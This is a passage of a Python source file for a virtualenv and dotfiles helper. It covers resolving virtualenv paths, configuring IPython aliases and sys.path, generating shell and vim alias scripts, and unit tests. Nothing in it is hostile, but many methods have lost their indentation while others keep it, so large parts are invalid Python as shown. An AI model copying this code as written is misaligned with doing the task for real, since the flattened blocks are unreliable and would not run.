        logevent('parse_VENVSTR_input', {'kwargs': kwargs, 'env': env})
        WORKON_HOME = lookup('WORKON_HOME', default=get_WORKON_HOME_default())
        VENVSTR = lookup('VENVSTR')
        if VENVSTR is not None:
            env['VENVSTR'] = VENVSTR
        VENVSTRAPP = lookup('VENVSTRAPP', default=lookup('_APP'))
        _APP = lookup('_APP',
                      default=lookup('VENVSTRAPP',
                                     default=lookup('VENVSTR')))
        # a VENVSTR containing '/' is a path; otherwise it names a venv
        # within WORKON_HOME
        if VENVSTR not in (None, ''):
            if '/' not in VENVSTR:
                VIRTUAL_ENV = joinpath(WORKON_HOME, VENVSTR)
            else:
                VIRTUAL_ENV = os.path.abspath(VENVSTR)
        # derive VIRTUAL_ENV_NAME and _APP from VENVSTRAPP when given
        if VENVSTRAPP is not None:
            VIRTUAL_ENV_NAME = VENVSTRAPP.split(os.path.sep)[0]
            _APP = VENVSTRAPP
        else:
            if VIRTUAL_ENV:
                VIRTUAL_ENV_NAME = os.path.basename(VIRTUAL_ENV)
            else:
                VIRTUAL_ENV_NAME = VENVSTR
            _APP = VIRTUAL_ENV_NAME
            VENVSTRAPP = _APP
        # fall back to the lookup chain, then WORKON_HOME/VIRTUAL_ENV_NAME
        if VIRTUAL_ENV is None:
            VIRTUAL_ENV = lookup('VIRTUAL_ENV')
        if VIRTUAL_ENV is None:
            if WORKON_HOME and VIRTUAL_ENV_NAME:
                VIRTUAL_ENV = joinpath(WORKON_HOME, VIRTUAL_ENV_NAME)
        if VIRTUAL_ENV:
            env['VIRTUAL_ENV'] = VIRTUAL_ENV
        VENVPREFIX = lookup('VENVPREFIX', default=VIRTUAL_ENV)
        # write the resolved values back into env
        env['WORKON_HOME'] = WORKON_HOME
        env['VENVSTR'] = VENVSTR
        env['VENVSTRAPP'] = VENVSTRAPP
        env['_APP'] = _APP
        env['VIRTUAL_ENV_NAME'] = VIRTUAL_ENV_NAME
        env['VENVPREFIX'] = VENVPREFIX
        env['VIRTUAL_ENV'] = VIRTUAL_ENV
        logevent('parse_VENVSTR_output', {'env': env, 'kwargs': kwargs, })
        #import ipdb
        # ipdb.set_trace()
        return env
@property
def aliases(self):
"""
Returns:
OrderedDict: self.env.aliases
"""
return self.env.aliases
@staticmethod
def _configure_sys(env=None, from_environ=False, pyver=None):
"""
Configure ``sys.path`` with the given :py:mod:`Env`,
or from ``os.environ``.
Args:
env (Env): Env to configure sys.path according to
(default: None)
from_environ (bool): whether to read Env from ``os.environ``
(default: False)
pyver (str): "python2.7" "python3.4" defaults to ``sys.platform``
.. note:: This method adds
``/usr/local/python.ver.ver/dist-packages/IPython/extensions``
to ``sys.path``
Why? When working in a virtualenv which does not have
an additional local copy of IPython installed,
the lack of an extensions path was causing errors
in regards to missing extensions.
If the path does not exist, it will not be added.
"""
if from_environ:
env = Env.from_environ(os.environ)
if pyver is None:
pyver = get_pyver()
env['_PYLIB'] = joinpath(env['_LIB'], pyver)
env['_PYSITE'] = joinpath(env['_PYLIB'], 'site-packages')
# emulate virtualenv check for no-global-site-packages.txt
no_global_site_packages = joinpath(
env('_PYLIB'), 'no-global-site-packages.txt')
if not os.path.exists(no_global_site_packages):
sys_libdir = joinpath("/usr/lib", pyver)
# XXX: **OVERWRITE** sys.path
sys.path = [joinpath(sys_libdir, p) for p in (
"", "plat-linux2", "lib-tk", "lib-dynload")]
# XXX: append /usr/local/lib/{pyver}/IPython/extensions # TODO?
ipython_extensions = (
'/usr/local/lib/%s/dist-packages/IPython/extensions'
% pyver)
if not os.path.exists(ipython_extensions):
log.info("IPython extensions not found: %r",
ipython_extensions)
if ipython_extensions not in sys.path:
sys.path.append(ipython_extensions)
# optimize_python_path(sys.path)
site.addsitedir(env['_PYSITE'])
return env
def configure_sys(self):
"""
Returns:
list: ``sys.path`` list from ``_configure_sys``.
"""
return Venv._configure_sys(self.env)
@classmethod
def workon(cls, env=None, VENVSTR=None, VENVSTRAPP=None, **kwargs):
"""
Args:
VENVSTR (str): a path to a virtualenv containing ``/``
OR just the name of a virtualenv in ``$WORKON_HOME``
VENVSTRAPP (str): e.g. ``dotfiles`` or ``dotfiles/docs``
kwargs (dict): kwargs to pass to Venv (see ``Venv.__init__``)
Returns:
Venv: an intialized ``Venv``
"""
return cls(env=env, VENVSTR=VENVSTR, VENVSTRAPP=VENVSTRAPP, **kwargs)
    @staticmethod
    def _configure_ipython(c=None,
                           platform=None,
                           sympyprinting=False,
                           parallelmagic=False,
                           storemagic=True,
                           storemagic_autorestore=False,
                           autoreload=True,
                           deep_reload=False,
                           venvaliases=True,
                           usrlog=True,
                           venv_ipyconfig_debug=False,
                           setup_func=None):
        """
        Configure an IPython config object with venv defaults and aliases.

        Loads the **storemagic** extension (and optionally
        **sympyprinting** / **parallelmagic** when their imports succeed),
        and installs the default alias sets.

        Keyword Arguments:
            c (object): An IPython configuration object (``get_config()``);
                when None, the module-level ``IPYTHON_CONFIG`` is used if
                ``IN_IPYTHON_CONFIG`` is set, otherwise this is a no-op
            platform (str): platform string
                (``uname``: {'Linux', 'Darwin'})

                .. note:: If ``None``, ``platform`` is necessarily
                    autodetected so that ``ps`` and ``ls`` aliases work with
                    syntax coloring and Linux and OSX BSD coreutils.
            sympyprinting (bool): load ``sympyprinting`` if sympy imports
            parallelmagic (bool): load ``parallelmagic`` if zmq imports
            storemagic (bool): load the ``storemagic`` extension
            storemagic_autorestore (bool): ``%store`` autorestore at startup
            autoreload (bool): currently unused -- the corresponding
                config lines below are commented out
            deep_reload (bool): set ``InteractiveShell.deep_reload``
            venvaliases (bool): install default + overlay aliases
            usrlog (bool): install usrlog aliases
            venv_ipyconfig_debug (bool): drop into pdb before configuring
            setup_func (function): a function to call with
                config as the first positional argument,
                **after** default configuration (default: ``None``)

        Returns:
            object: ``setup_func(c)`` if given, else ``c``;
            None when not in an IPython config context

        References:
            * http://ipython.org/ipython-doc/dev/config/
            * http://ipython.org/ipython-doc/dev/config/options/terminal.html
        """
        if c is None:
            if not IN_IPYTHON_CONFIG:
                # skip IPython configuration
                log.error("not in_venv_ipyconfig")
                return
            else:
                c = IPYTHON_CONFIG  # get_config()
        if venv_ipyconfig_debug:
            import pdb; pdb.set_trace()
        # c.InteractiveShellApp.ignore_old_config = True
        c.InteractiveShellApp.log_level = 20
        # TODO: c.InteractiveShellApp.extensions.append?
        c.InteractiveShellApp.extensions = [
            # 'autoreload',
        ]
        if sympyprinting:
            # sympy is optional; skip silently if not installed
            try:
                import sympy
                c.InteractiveShellApp.extensions.append('sympyprinting')
            except ImportError as e:
                pass
        if parallelmagic:
            # parallelmagic requires zmq; skip silently if not installed
            try:
                import zmq
                zmq
                c.InteractiveShellApp.extensions.append('parallelmagic')
            except ImportError:
                pass
        # c.InteractiveShell.autoreload = autoreload
        c.InteractiveShell.deep_reload = deep_reload
        if storemagic:
            # %store [name]
            c.InteractiveShellApp.extensions.append('storemagic')
            c.StoreMagic.autorestore = storemagic_autorestore
        if venvaliases:
            # platform-aware defaults, then the overlay overrides
            ipython_default_aliases = get_IPYTHON_ALIAS_DEFAULTS(
                platform=platform).items()
            c.AliasManager.default_aliases.extend(ipython_default_aliases)
            ipython_alias_overlay = get_IPYTHON_ALIAS_OVERLAY()
            c.AliasManager.default_aliases.extend(ipython_alias_overlay)
        if usrlog:
            # TODO: if kwargs.get('_USRLOG', kwargs.get('__USRLOG'))
            usrlog_alias_overlay = get_USRLOG_ALIAS_OVERLAY()
            c.AliasManager.default_aliases.extend(usrlog_alias_overlay)
        output = c
        if setup_func:
            output = setup_func(c)
        return output
def configure_ipython(self, *args, **kwargs):
"""
Configure IPython with ``Venv._configure_ipython`` and
``user_aliases`` from ``self.aliases.items()``.
Args:
args (list): args for ``Venv._configure_ipython``
kwargs (dict): kwargs for ``Venv._configure_ipython``.
"""
def setup_func(c):
c.AliasManager.user_aliases = [
(k, v) for (k, v) in self.env.aliases.items()
if not k.startswith('cd')]
return Venv._configure_ipython(*args, setup_func=setup_func, **kwargs)
def generate_vars_env(self, **kwargs):
"""
Generate a string containing VARIABLE='./value'
"""
for block in self.env.to_string_iter(**kwargs):
yield block
def generate_bash_env(self,
shell_keyword='export ',
shell_quotefunc=shell_quote,
include_paths=True,
include_aliases=True,
include_cdaliases=False,
**kwargs):
"""
Generate a ``source``-able script for the environment variables,
aliases, and functions defined by the current ``Venv``.
Keyword Arguments:
shell_keyword (str): shell variable def (default: "export ")
include_paths (bool): Include environ vars in output (default: True)
include_aliases (bool): Include aliases in output (default: True)
include_cdaliases (bool): Include cdaliases in output (default: False)
compress_paths (bool): Compress paths to $VAR (default=False)
Yields:
str: block of bash script
"""
compress_paths = kwargs.get('compress_paths')
if include_paths:
for k, v in self.env.iteritems_environ():
# TODO: XXX:
if v is None:
v = ''
if compress_paths:
v = self.env.compress_paths(v, keyname=k)
# if _shell_supports_declare_g():
# shell_keyword="declare -grx "
# yield "declare -grx %s=%r" % (k, v)
# else:
# yield "export %s=%r" % (k, v
# yield("declare -r %k" % k, file=output)
yield "{keyword}{VAR}={value}".format(
keyword=shell_keyword,
VAR=k,
value=shell_quotefunc(v))
if include_cdaliases:
yield CdAlias.BASH_CDALIAS_HEADER
if include_aliases:
for k, v in self.env.aliases.items():
bash_alias = None
if hasattr(v, 'to_bash_function'):
bash_alias = v.to_bash_function()
if hasattr(v, 'to_shell_str'):
bash_alias = v.to_shell_str()
else:
_alias = IpyAlias(v, k)
bash_alias = _alias.to_shell_str()
if compress_paths:
bash_alias = self.env.compress_paths(bash_alias, keyname=k)
yield bash_alias
def generate_bash_cdalias(self):
"""
Generate a ``source``-able script for cdalias functions
Yields:
str: block of bash script
"""
yield CdAlias.BASH_CDALIAS_HEADER
for k, v in self.env.aliases.items():
if isinstance(v, CdAlias):
yield v.to_bash_function()
elif k in ('cdls', 'cdhelp'):
yield IpyAlias(v, k).to_shell_str()
def generate_vim_cdalias(self):
"""
Generate a ``source``-able vimscript for vim
Yields:
str: block of vim script
"""
yield CdAlias.VIM_HEADER_TEMPLATE
# for k, v in self.env.items():
# yield ("export %s=%r" % (k, v))
for k, v in self.env.aliases.items():
if hasattr(v, 'to_vim_function'):
yield v.to_vim_function()
def generate_venv_ipymagics(self):
"""
Generate an ``venv_ipymagics.py`` file for IPython
Yields:
str: block of Python code
"""
yield CdAlias.VENV_IPYMAGICS_FILE_HEADER
for k, v in self.env.aliases.items():
if hasattr(v, 'to_ipython_method'):
for block in v.to_ipython_method():
yield block
yield CdAlias.VENV_IPYMAGICS_FOOTER
@property
def project_files(self):
return self._project_files()
def _project_files(self, extension='.rst'):
"""
Default list of project files for ``_EDITCMD_``.
Returns:
list: list of paths relative to ``$_WRD``.
"""
default_project_files = (
'README{}'.format(extension),
'CHANGELOG{}'.format(extension),
'Makefile',
'setup.py',
'requirements.txt',
'.git/config',
'.gitignore',
'.hg/hgrc',
'.hgignore',
'',
'.',
'docs',
)
return default_project_files
@property
def PROJECT_FILES(self):
PROJECT_FILES = ' '.join(
shell_quote(joinpath(self.env['_WRD'], fpath))
for fpath in (self.project_files))
return PROJECT_FILES
@property
def _edit_project_cmd(self):
"""
Command to edit ``self.project_files``
Returns:
str: ``$_EDIT_`` ``self.project_files``
"""
return "%s %s" % (self.env['_EDIT_'], self.PROJECT_FILES)
@property
def _terminal_cmd(self):
"""
Command to open a terminal
Returns:
str: env.get('TERMINAL') or ``/usr/bin/gnome-terminal``
"""
# TODO: add Terminal.app
return self.env.get('TERMINAL', '/usr/bin/gnome-terminal')
@property
def _open_terminals_cmd(self):
"""
Command to open ``self._terminal_cmd`` with a list of initial
named terminals.
"""
# TODO: add Terminal.app (man Terminal.app?)
cmd = (
self._terminal_cmd,
'--working-directory', self.env['_WRD'],
'--tab', '--title', '%s: bash' % self.env['_APP'],
'--command', 'bash',
'--tab', '--title', '%s: serve' % self.env['_APP'],
'--command', "bash -c 'we %s %s'; bash" % (
self.env['VIRTUAL_ENV'], self.env['_APP']), #
'--tab', '--title', '%s: shell' % self.env['_APP'],
'--command', "bash -c %r; bash" % self.env['_SHELL_']
)
return cmd
def system(self, cmd=None):
"""
Call ``os.system`` with the given command string
Args:
cmd (string): command string to call ``os.system`` with
Raises:
Exception: if ``cmd`` is None
NotImplementedError: if ``cmd`` is a tuple
"""
if cmd is None:
raise Exception()
if isinstance(cmd, (tuple, list)):
_cmd = ' '.join(cmd)
# TODO: (subprocess.Popen)
raise NotImplementedError()
elif isinstance(cmd, (str,)):
_cmd = cmd
return os.system(_cmd)
def open_editors(self):
"""
Run ``self._edit_project_cmd``
"""
cmd = self._edit_project_cmd
return self.system(cmd=cmd)
def open_terminals(self):
"""
Run ``self._open_terminals_cmd``
"""
cmd = self._open_terminals_cmd
return self.system(cmd=cmd)
    def to_dict(self):
        """
        Serialize this venv's environment to a dict.

        Returns:
            OrderedDict: ``self.env.to_dict()`` (aliases are NOT included;
            see the commented-out alternative below)
        """
        return self.env.to_dict()
        #OrderedDict(
        #env=self.env,
        ## aliases=self.aliases,
        #)
def to_json(self, indent=None):
"""
Args:
indent (int): number of spaces with which to indent JSON output
Returns:
str: json.dumps(self.to_dict())
"""
return json.dumps(self.to_dict(), indent=indent, cls=VenvJSONEncoder)
@staticmethod
def update_os_environ(venv, environ=None):
"""
Update os.environ for the given venv
Args:
environ (dict): if None, defaults to os.environ
Returns:
dict: updated environ dict
"""
environ = environ or os.environ
environ.update((k, str(v)) for (k, v) in venv.env.environ.items())
return environ
    def call(self, command):
        """
        Run ``command`` with ``subprocess.call`` from within ``$VENVPREFIX``.

        Args:
            command (str): shell command string to run

        Returns:
            int: returncode from :py:func:`subprocess.call`

        Raises:
            ConfigException: if neither VENVPREFIX nor VIRTUAL_ENV is set
        """
        # side effect: pushes this venv's variables into os.environ
        # so the child process inherits them
        env = self.update_os_environ(self, os.environ)
        VENVPREFIX = self.env.get('VENVPREFIX',
                                  self.env.get('VIRTUAL_ENV', None))
        if VENVPREFIX is None:
            raise ConfigException("VENVPREFIX is None")
        # 'command' and 'VENVPREFIX' are included only for the log record;
        # they are popped before the rest is passed as subprocess kwargs
        config = {
            'command': command,
            'shell': True,
            #'env': env,
            'VENVPREFIX': VENVPREFIX,
            'cwd': VENVPREFIX}
        logevent('subprocess.call', config, level=logging.INFO)
        config.pop('command')
        config.pop('VENVPREFIX')
        # " #venv.call" tags the command in shell history / process listings
        return subprocess.call(command + " #venv.call", **config)
def get_IPYTHON_ALIAS_DEFAULTS(platform=None):
    """Build the default IPython alias mapping for a platform.

    Keyword Arguments:
        platform (str): ``sys.platform``-style string
            (default: ``sys.platform``); ``'darwin'`` selects BSD-style
            ``ls``/``ps`` flags instead of GNU coreutils flags

    Returns:
        OrderedDict: mapping of alias name -> shell command string
    """
    platform = sys.platform if platform is None else platform
    is_darwin = (platform == 'darwin')
    if is_darwin:
        # BSD coreutils (OSX)
        ls_color_auto = "-G"
        psx_command = 'ps uxaw'
        psf_command = 'ps uxaw'
        ps_sort_cpu = '-c'
        ps_sort_mem = '-m'
    else:
        # GNU coreutils
        ls_color_auto = "--color=auto"
        psx_command = 'ps uxaw'
        psf_command = 'ps uxawf'
        ps_sort_cpu = '--sort=-pcpu'
        ps_sort_mem = '--sort=-pmem'
    return OrderedDict((
        ('cp', 'cp'),
        ('bash', 'bash'),
        ('cat', 'cat'),
        ('chmodr', 'chmod -R'),
        ('chownr', 'chown -R'),
        ('egrep', 'egrep --color=auto'),
        ('fgrep', 'fgrep --color=auto'),
        ('git', 'git'),
        ('ga', 'git add'),
        ('gd', 'git diff'),
        ('gdc', 'git diff --cached'),
        ('gs', 'git status'),
        ('gl', 'git log'),
        ('grep', 'grep --color=auto'),
        ('grin', 'grin'),
        ('grind', 'grind'),
        ('grinpath', 'grin --sys-path'),
        ('grindpath', 'grind --sys-path'),
        ('grunt', 'grunt'),
        ('gvim', 'gvim'),
        ('head', 'head'),
        ('hg', 'hg'),
        ('hgl', 'hg log -l10'),
        ('hgs', 'hg status'),
        ('htop', 'htop'),
        ('ifconfig', 'ifconfig'),
        ('ip', 'ip'),
        ('last', 'last'),
        ('la', 'ls {} -A'.format(ls_color_auto)),
        ('ll', 'ls {} -al'.format(ls_color_auto)),
        ('ls', 'ls {}'.format(ls_color_auto)),
        ('lt', 'ls {} -altr'.format(ls_color_auto)),
        ('lll', 'ls {} -altr'.format(ls_color_auto)),
        ('lz', 'ls {} -alZ'.format(ls_color_auto)),
        ('lxc', 'lxc'),
        ('make', 'make'),
        ('mkdir', 'mkdir'),
        ('netstat', 'netstat'),
        ('nslookup', 'nslookup'),
        ('ping', 'ping'),
        ('mv', 'mv'),
        ('ps', 'ps'),
        ('psf', psf_command),
        ('psx', psx_command),
        ('psh', '{} | head'.format(psx_command)),
        ('psc', '{} {}'.format(psx_command, ps_sort_cpu)),
        ('psch', '{} {} | head'.format(psx_command, ps_sort_cpu)),
        ('psm', '{} {}'.format(psx_command, ps_sort_mem)),
        ('psmh', '{} {} | head'.format(psx_command, ps_sort_mem)),
        ('psfx', psf_command),
        ('pydoc', 'pydoc'),
        ('pyline', 'pyline'),
        ('pyrpo', 'pyrpo'),
        ('route', 'route'),
        ('rm', 'rm'),
        ('rsync', 'rsync'),
        ('sqlite3', 'sqlite3'),
        ('ss', 'ss'),
        ('ssv', 'supervisord'),
        ('stat', 'stat'),
        ('sudo', 'sudo'),
        ('sv', 'supervisorctl'),
        ('t', 'tail -f'),
        ('tail', 'tail'),
        ('thg', 'thg'),
        ('top', 'top'),
        ('tracepath', 'tracepath'),
        ('tracepath6', 'tracepath6'),
        ('vim', 'vim'),
        ('uptime', 'uptime'),
        ('which', 'which'),
        ('who_', 'who'),
        ('whoami', 'whoami'),
        ('zsh', 'zsh'),
    ))
def get_IPYTHON_ALIAS_OVERLAY():
    """Return alias overrides applied on top of the IPython defaults.

    Returns:
        tuple: (name, command) pairs
    """
    return (
        ('pydoc', 'pydoc %l | cat'),
        # ('pip', 'pip'),
        ('venv', 'venv'),
    )
def get_USRLOG_ALIAS_OVERLAY():
    """Return usrlog-specific alias overrides.

    Returns:
        tuple: (name, command) pairs
    """
    return (('ut', 'tail $$_USRLOG'),)
def ipython_main():
    """Configure IPython, venv-aware when ``$VIRTUAL_ENV`` is set.

    When ``VIRTUAL_ENV`` is in ``os.environ``, a :py:class:`Venv` is built
    from the environment and its aliases are installed via
    :py:meth:`Venv.configure_ipython`; otherwise only the default
    :py:meth:`Venv._configure_ipython` configuration is applied.
    """
    if 'VIRTUAL_ENV' in os.environ:
        Venv(from_environ=True).configure_ipython()
    else:
        Venv._configure_ipython()
def ipython_imports():
    """
    Import a default set of IPython convenience names (currently unused).

    The bare-name statements after each import keep linters from flagging
    the imports as unused; these bindings are function-local, so this
    only has effect if the body is pasted into an interactive namespace.
    """
    from IPython.external.path import path
    path
    from pprint import pprint as pp
    pp
    from pprint import pformat as pf
    pf
    import json

    def ppd(self, *args, **kwargs):
        # pretty-print type and JSON of the given args
        # NOTE(review): ``self`` here is just the first positional argument
        # of this helper; confirm the intended calling convention
        print(type(self))
        print(
            json.dumps(*args, indent=2))
# Tests
class VenvTestUtils(object):

    """
    Test fixtures for TestCases and examples
    """

    @staticmethod
    def build_env_test_fixture(env=None):
        """Build an Env populated with the default ``dotfiles`` test values.

        Keyword Arguments:
            env (Env): env to fill in (default: a new ``Env()``)

        Returns:
            Env: env with __WRK, WORKON_HOME, VENVSTR, VENVSTRAPP, _APP,
            VIRTUAL_ENV_NAME, VIRTUAL_ENV, VENVPREFIX, _SRC, _ETC, _WRD set
            (existing values are preserved)
        """
        if env is None:
            env = Env()
        env['__WRK'] = env.get('__WRK',
                               get___WRK_default(env=env))
        env['WORKON_HOME'] = env.get('WORKON_HOME',
                                     get_WORKON_HOME_default(env=env))
        env['VENVSTR'] = env.get('VENVSTR',
                                 'dotfiles')
        env['VENVSTRAPP'] = env.get('VENVSTRAPP',
                                    env['VENVSTR'])
        env['_APP'] = env.get('_APP',
                              env.get('VENVSTRAPP',
                                      env['VENVSTR']))  # TODO || basename(VENVPREFIX)
        env['VIRTUAL_ENV_NAME'] = env.get('VIRTUAL_ENV_NAME',
                                          os.path.basename(
                                              env['VENVSTR']))
        env['VIRTUAL_ENV'] = env.get('VIRTUAL_ENV',
                                     joinpath(
                                         env['WORKON_HOME'],
                                         env['VIRTUAL_ENV_NAME']))
        env['VENVPREFIX'] = env.get('VENVPREFIX') or env.get('VIRTUAL_ENV')
        env['_SRC'] = joinpath(env['VENVPREFIX'], 'src')
        env['_ETC'] = joinpath(env['VENVPREFIX'], 'etc')
        env['_WRD'] = joinpath(env['_SRC'], env['_APP'])
        return env

    @staticmethod
    def capture_io(f):
        """
        Add stdout and stderr kwargs to a function call
        and return (output, _stdout, _stderr)
        """
        # BUGFIX: functools.wraps(f) was called but its result (the
        # decorator) was discarded; apply it as a decorator instead
        @functools.wraps(f)
        def __capture_io(*args, **kwargs):
            # ... partial/wraps
            _stdout = kwargs.get('stdout', StringIO())
            # BUGFIX: was ``kwargs.get(StringIO())``, which looked up a
            # fresh StringIO instance as a *key* and always returned None
            _stderr = kwargs.get('stderr', StringIO())
            ioconf = {"stdout": _stdout, "stderr": _stderr}
            kwargs.update(ioconf)
            output = f(*args, **kwargs)
            # _stdout.seek(0), _stderr.seek(0)
            return output, _stdout, _stderr
        return __capture_io
if __name__ == '__main__':
_TestCase = unittest.TestCase
else:
_TestCase = object
class VenvTestCase(_TestCase):
    """unittest.TestCase when run as a script; otherwise a plain object"""
class Test_001_lookup(VenvTestCase, unittest.TestCase):

    def test_100_lookup(self):
        """lookup_from_kwargs_env prefers kwargs, then env, then default"""
        kwargs = {'True': True, 'envTrue': True,
                  'isNone': None, 'kwargsTrue': True,
                  'collide': 'kwargs'}
        env = {'True': True, 'envTrue': True,
               'isNone': None, 'envNone': True,
               'collide': 'env'}

        def lookup(attr, default=None):
            return lookup_from_kwargs_env(kwargs, env, attr, default=default)
        self.assertTrue(lookup('True'))
        self.assertTrue(lookup('kwargsTrue'))
        self.assertTrue(lookup('envTrue'))
        # on key collision, the kwargs value wins
        self.assertEqual(lookup('collide'), 'kwargs')
        # missing keys fall back to the default (None unless given)
        self.assertIsNone(lookup('...'))
        self.assertTrue(lookup('...', default=True))
class Test_100_Env(VenvTestCase, unittest.TestCase):

    def test_010_Env(self):
        """setting a key also mirrors it into ``env.environ``"""
        e = Env()
        self.assertTrue(e)
        assert 'WORKON_HOME' not in e
        e['WORKON_HOME'] = '~/-wrk/-ve27'
        assert 'WORKON_HOME' in e
        assert 'WORKON_HOME' in e.environ

    def test_020_Env_copy(self):
        """copies are independent: new keys do not leak back"""
        e = Env()
        keyname = '_test'
        self.assertNotIn(keyname, e)
        e[keyname] = True
        self.assertIn(keyname, e)
        e2 = e.copy()
        self.assertIn(keyname, e2)
        keyname = '_test2'
        e2[keyname] = True
        self.assertIn(keyname, e2)
        self.assertNotIn(keyname, e)

    def test_Env_from_environ(self):
        """``Env.from_environ`` builds a truthy Env from os.environ"""
        import os
        e = Env.from_environ(os.environ)
        print(e)
        self.assertTrue(e)
class Test_200_StepBuilder(VenvTestCase, unittest.TestCase):

    def test_000_Step(self):
        """a Step wraps a build function"""
        def build_func(env, **kwargs):
            return env
        s = Step(build_func)
        self.assertTrue(s)

    def test_500_StepBuilder(self):
        """a StepBuilder with no steps passes the env through unchanged"""
        env = Env()
        env['_test'] = True
        builder = StepBuilder()
        # NOTE(review): build() is unpacked as (step, new_env) here, unlike
        # the single-value usage in Venv.build -- confirm
        # StepBuilder.build's return signature
        step, new_env = builder.build(env=env)
        self.assertTrue(new_env)
        self.assertEqual(env.environ.items(), new_env.environ.items())
        builder = StepBuilder()
        step, new_env = builder.build(env=env)
        self.assertTrue(new_env)
        self.assertEqual(env, new_env)

    def test_600_StepBuilder(self):
        """PrintEnvStderrStep does not modify the env"""
        env = Env()
        env['_test'] = True
        builder = StepBuilder()
        builder.add_step(PrintEnvStderrStep)
        step, new_env = builder.build(env=env)
        self.assertTrue(new_env)
        self.assertEqual(env, new_env)
class Test_250_Venv(VenvTestCase, unittest.TestCase):

    """Tests for :py:meth:`Venv.parse_VENVSTR`."""

    def setUp(self):
        # shared fixture env with default 'dotfiles' values
        self.env = VenvTestUtils.build_env_test_fixture()
        self.envattrs = ['VIRTUAL_ENV', 'VIRTUAL_ENV_NAME', '_APP',
                         'VENVSTR', 'VENVSTRAPP', 'VENVPREFIX']

    def test_000_venv_test_fixture(self):
        """the fixture defines and mirrors each expected attribute"""
        self.assertTrue(self.env)
        for attr in self.envattrs:
            self.assertIn(attr, self.env)
            self.assertIn(attr, self.env.environ)
            self.assertEqual(self.env.get(attr), self.env[attr])

    def test_010_assert_venv_requires_VENVPREFIX__or__VIRTUAL_ENV(self):
        with self.assertRaises(Exception):
            venv = Venv()

    def test_100_Venv_parse_VENVSTR_env__and__VENVSTR(self):
        env = Venv.parse_VENVSTR(env=self.env, VENVSTR=self.env['VENVSTR'])
        for attr in self.envattrs:
            self.assertIn(attr, env)
            self.assertEqual(env[attr], self.env.environ[attr])
            self.assertEqual(env[attr], self.env[attr])

    def test_110_Venv_parse_VENVSTR_VENVSTR(self):
        env = Venv.parse_VENVSTR(VENVSTR=self.env['VENVSTR'])
        for attr in self.envattrs:
            self.assertIn(attr, env)
            print(attr)
            try:
                self.assertEqual(env[attr], self.env[attr])
            except Exception:
                print(attr)
                raise

    # BUGFIX: renamed from test_110_Venv_parse_VENVSTR_VENVSTR, which
    # shadowed the method above (the first definition never ran)
    def test_111_Venv_parse_VENVSTR_VENVSTR(self):
        env = Venv.parse_VENVSTR(VENVSTR=self.env['VENVSTR'])
        for attr in self.envattrs:
            try:
                self.assertEqual(env[attr], self.env[attr])
            except Exception:
                # surface the failing attr name in the assertion message
                self.assertEqual(attr+'-'+env[attr], attr)
                raise

    def test_120_Venv_parse_VENVSTR_VENVSTR_VENVSTRAPP(self):
        VENVSTRAPP = 'dotfiles/docs'
        self.env = VenvTestUtils.build_env_test_fixture(
            Env(VENVSTRAPP=VENVSTRAPP, _APP=VENVSTRAPP))
        env = Venv.parse_VENVSTR(VENVSTR=self.env['VENVSTR'],
                                 VENVSTRAPP=VENVSTRAPP)
        for attr in self.envattrs:
            self.assertIn(attr, env)
            self.assertEqual(env[attr], self.env[attr])
        self.assertEqual(env['_APP'], VENVSTRAPP)
        self.assertEqual(env['VENVSTRAPP'], VENVSTRAPP)
class Test_300_venv_build_env(VenvTestCase, unittest.TestCase):

    """
    test each build step independently

    .. code:: python

        kwargs = {}
        env = env.copy()
        buildfunc = build_virtualenvwrapper_env
        new_env = buildfunc(env=env, **kwargs)
    """

    def setUp(self):
        self.env = VenvTestUtils.build_env_test_fixture()

    @staticmethod
    def print_(*args, **kwargs):
        # debug helper: print whatever the test passes in
        # BUGFIX: was ``def print_(self, *args, **kwargs)`` on a
        # @staticmethod, so ``self.print_(env)`` bound env to the unused
        # ``self`` parameter and the env was never printed
        print(args, kwargs)

    def test_100_build_dotfiles_env(self):
        env = build_dotfiles_env()
        self.print_(env)
        self.assertTrue(env)

    def test_200_build_usrlog_env(self):
        env = build_usrlog_env()
        self.print_(env)
        self.assertTrue(env)

    def test_400_build_virtualenvwrapper_env(self):
        env = build_virtualenvwrapper_env()
        self.print_(env)
        self.assertTrue(env)

    def test_500_build_conda_env(self):
        env = build_conda_env()
        self.print_(env)
        self.assertTrue(env)

    def test_600_build_conda_cfg_env(self):
        env = build_conda_cfg_env()
        #env = build_conda_cfg_env(env=env, conda_root=None, conda_home=None)
        self.print_(env)
        self.assertTrue(env)

    def test_600_build_venv_paths_full_env__prefix_None(self):
        with self.assertRaises(ConfigException):
            env = build_venv_paths_full_env()

    def test_610_build_venv_paths_full_env__prefix_root(self):
        env = build_venv_paths_full_env(VENVPREFIX='/')
        self.print_(env)
        self.assertTrue(env)
        self.assertEqual(env['_BIN'], '/bin')
        self.assertEqual(env['_ETC'], '/etc')
        self.assertEqual(env['_SRC'], '/src')  # TODO
        self.assertEqual(env['_LOG'], '/var/log')
        # self.assertIn('WORKON_HOME', env)

    def test_620_build_venv_paths_full_env__prefix_None(self):
        env = build_venv_activate_env(VENVSTR=self.env["VENVSTR"])
        env = build_venv_paths_full_env(env)
        self.print_(env)
        self.assertTrue(env)
        self.assertIn('VIRTUAL_ENV', env)
        self.assertEqual(env["VIRTUAL_ENV"], self.env["VIRTUAL_ENV"])

    def test_650_build_venv_paths_cdalias_env(self):
        env = build_venv_paths_cdalias_env()
        self.print_(env)
        self.assertTrue(env)
class Test_500_Venv(VenvTestCase, unittest.TestCase):

    def setUp(self):
        # shared fixture env with default 'dotfiles' values
        self.env = VenvTestUtils.build_env_test_fixture()

    def test_000_venv(self):
        """the fixture is populated and Venv() without args raises"""
        self.assertTrue(self.env)
        for attr in ['VENVSTR', 'VIRTUAL_ENV', 'VIRTUAL_ENV_NAME', '_APP']:
            self.assertIn(attr, self.env)
        with self.assertRaises(Exception):
            venv = Venv()

    def test_005_venv(self):
        """Venv(VENVSTR=...) derives the fixture's attributes"""
        venv = Venv(VENVSTR=self.env['VENVSTR'])
        self.assertTrue(venv)
        self.assertTrue(venv.env)
        print(venv.env)
        for attr in ['VIRTUAL_ENV', 'VIRTUAL_ENV_NAME', '_APP']:
            self.assertIn(attr, venv.env)
            self.assertEqual(venv.env[attr], self.env[attr])

    def test_010_venv__APP(self):
        """an explicitly passed _APP is preserved"""
        venv = Venv(VENVSTR=self.env['VIRTUAL_ENV'], _APP=self.env['_APP'])
        self.assertIn('_APP', venv.env)
        self.assertEqual(venv.env['_APP'], self.env['_APP'])

    def test_011_venv__APP(self):
        """a multi-segment _APP (e.g. 'dotfiles/docs') extends _WRD"""
        _APP = "dotfiles/docs"
        VENVSTRAPP = "dotfiles/docs"
